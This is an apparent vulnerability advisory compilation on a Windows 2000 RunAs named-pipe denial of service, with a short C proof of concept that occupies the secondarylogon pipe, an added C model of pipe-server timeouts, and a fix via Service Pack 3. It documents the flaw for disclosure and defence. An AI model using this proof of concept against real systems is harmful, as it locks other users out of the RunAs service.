RunAs (runas.exe) in Windows 2000 only creates one session instance at a time, which allows local users to cause a denial of service (RunAs hang) by creating a named pipe session with the authentication server without any request for service. NOTE: the vendor disputes this vulnerability, however the vendor also presents a scenario in which other users could be affected if running on a Terminal Server. Therefore this is a vulnerability.
The fix for this vulnerability will reportedly be included in Service Pack 3. Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue.
Microsoft Windows 2000 RunAs Service Denial of Services Vulnerability (EDBID:21099)
The Windows 2000 RunAs service allows an application or service to be executed as a different user. It is accessed by holding down the Shift key and right-clicking an icon, then selecting 'Run as...' from the context menu.
When the service is invoked, it creates a named pipe session with the specified server for authentication of credentials. The RunAs service only allows one instance of this session at a time. If a client were to create this pipe on the server without requesting any service, other clients would be unable to connect to this service.
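// radix1112200103.c - Camisade - Team RADIX - 11-12-2001
// Camisade (www.camisade.com) is not responsible for the use or
// misuse of this proof of concept source code.
#include <windows.h>
#include <tchar.h>
#include <stdio.h>
#include <conio.h>
#define SECLOGON_PIPE _T("\\\\.\\pipe\\secondarylogon")
int main(void) {
    HANDLE hPipe = CreateFile(SECLOGON_PIPE, GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
    if (hPipe == INVALID_HANDLE_VALUE) { printf("Unable to open pipe, error %lu\n", GetLastError()); return 1; }
    printf("Connected to pipe. Press any key to disconnect.\n");
    _getch();             /* the pipe instance stays occupied until a key is pressed */
    CloseHandle(hPipe);   /* disconnect and release the instance */
    return 0;
}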
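The single-instance behaviour described in the discussion above can be reasoned about with a small portable model. This is an added example, not code from the advisory, the vendor or the proof-of-concept author; all names are hypothetical, and the idle timeout and extra instances are generic server hardening measures assumed for illustration, not a description of the Service Pack 3 change.

```c
#include <stdio.h>

/* Constructed model of a named pipe server (hypothetical names, not Windows API code). */
enum { MAX_SLOTS = 8 };
typedef struct {
    int max_instances;    /* 1 models the single-instance behaviour described above */
    int idle_timeout;     /* ticks a silent client may hold an instance; 0 = forever */
    int idle[MAX_SLOTS];  /* -1 = free, otherwise ticks connected without a request */
} pipe_server;

static void server_init(pipe_server *s, int max_instances, int idle_timeout) {
    s->max_instances = max_instances > MAX_SLOTS ? MAX_SLOTS : max_instances;
    s->idle_timeout = idle_timeout;
    for (int i = 0; i < MAX_SLOTS; i++) s->idle[i] = -1;
}

/* Returns the instance index, or -1 when every instance is taken (pipe busy). */
static int server_connect(pipe_server *s) {
    for (int i = 0; i < s->max_instances; i++)
        if (s->idle[i] < 0) { s->idle[i] = 0; return i; }
    return -1;
}

/* One clock tick: age silent clients and disconnect those past the timeout. */
static void server_tick(pipe_server *s) {
    for (int i = 0; i < s->max_instances; i++)
        if (s->idle[i] >= 0 && s->idle_timeout > 0 && ++s->idle[i] >= s->idle_timeout)
            s->idle[i] = -1;
}

/* `silent` clients connect first and never send a request. Returns the tick at
   which a legitimate client is served, or -1 if it is still locked out at `limit`. */
int ticks_until_served(int silent, int max_instances, int idle_timeout, int limit) {
    pipe_server s;
    server_init(&s, max_instances, idle_timeout);
    for (int i = 0; i < silent; i++) server_connect(&s);
    for (int t = 0; t <= limit; t++) {
        int slot = server_connect(&s);
        if (slot >= 0) { s.idle[slot] = -1; return t; } /* request served, instance freed */
        server_tick(&s);
    }
    return -1;
}

int main(void) {
    printf("1 instance, no timeout, 1 silent client:  %d\n", ticks_until_served(1, 1, 0, 100));
    printf("4 instances, no timeout, 4 silent clients: %d\n", ticks_until_served(4, 4, 0, 100));
    printf("4 instances, timeout 3, 4 silent clients:  %d\n", ticks_until_served(4, 4, 3, 100));
    return 0;
}
```

In this model, adding instances without an idle timeout only raises the number of silent connections needed to lock others out; the timeout is what bounds the wait.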
Microsoft Windows 2000 runas.exe Named Pipe Single Thread DoS
Local Access Required
Denial of Service
Loss of Availability
Microsoft Windows 2000 contains a flaw that may allow a local denial of service. The issue is triggered when a RUN AS dialog is opened and never closed. The operating system can service only one such dialog at a time, preventing other users from using the RUN AS service.
Upgrade to Service Pack version 3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.